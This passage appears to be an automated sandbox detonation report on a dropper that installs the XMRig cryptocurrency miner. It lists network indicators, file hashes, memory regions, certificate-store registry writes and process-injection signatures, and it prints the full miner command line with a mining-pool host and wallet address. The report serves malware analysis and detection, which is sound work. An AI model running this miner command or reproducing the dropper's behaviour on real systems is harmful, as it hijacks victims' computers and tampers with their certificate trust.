| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3312-16-0x000001CED4A50000-0x000001CED4A70000-memory.dmp
memory/3312-17-0x000001CED4A90000-0x000001CED4AB0000-memory.dmp
memory/3312-18-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-20-0x000001CED4AD0000-0x000001CED4AF0000-memory.dmp
memory/3312-19-0x000001CED4AB0000-0x000001CED4AD0000-memory.dmp
memory/3312-21-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-22-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-25-0x000001CED4AD0000-0x000001CED4AF0000-memory.dmp
memory/3312-24-0x000001CED4AB0000-0x000001CED4AD0000-memory.dmp
memory/3312-23-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-26-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-27-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-28-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-29-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-30-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-31-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-32-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-33-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-34-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-35-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-36-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-37-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-38-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-39-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-40-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-41-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-42-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-43-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-44-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-45-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-46-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-47-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-48-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-49-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-50-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-51-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-52-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-53-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-54-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-55-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-56-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-57-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-58-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-59-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-60-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-61-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-62-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-63-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-64-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-65-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-66-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-67-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-68-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-69-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-70-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-71-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-72-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-73-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-74-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-75-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-76-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-77-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-78-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-79-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-80-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-81-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-82-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-83-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
memory/3312-84-0x00007FF6672D0000-0x00007FF667DD3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:15
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3572 wrote to memory of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3572 wrote to memory of 4024 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4024-16-0x000001DA44DB0000-0x000001DA44DD0000-memory.dmp
memory/4024-17-0x000001DA44E00000-0x000001DA44E20000-memory.dmp
memory/4024-18-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-21-0x000001DA44E20000-0x000001DA44E40000-memory.dmp
memory/4024-20-0x000001DA44E40000-0x000001DA44E60000-memory.dmp
memory/4024-19-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-22-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-25-0x000001DA44E20000-0x000001DA44E40000-memory.dmp
memory/4024-24-0x000001DA44E40000-0x000001DA44E60000-memory.dmp
memory/4024-23-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-26-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-27-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-28-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-29-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-30-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-31-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-32-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-33-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-34-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-35-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-36-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-37-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-38-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-39-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-40-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-41-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-42-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-43-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-44-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-45-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-46-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-47-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-48-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-49-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-50-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-51-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-52-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-53-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-54-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-55-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-56-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-57-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-58-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-59-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-60-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-61-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-62-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-63-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-64-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-65-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-66-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-67-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-68-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-69-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-70-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-71-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-72-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-73-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-74-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-75-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-76-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-77-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-78-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-79-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-80-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-81-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-82-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-83-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
memory/4024-84-0x00007FF78AEF0000-0x00007FF78B9F3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:16
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040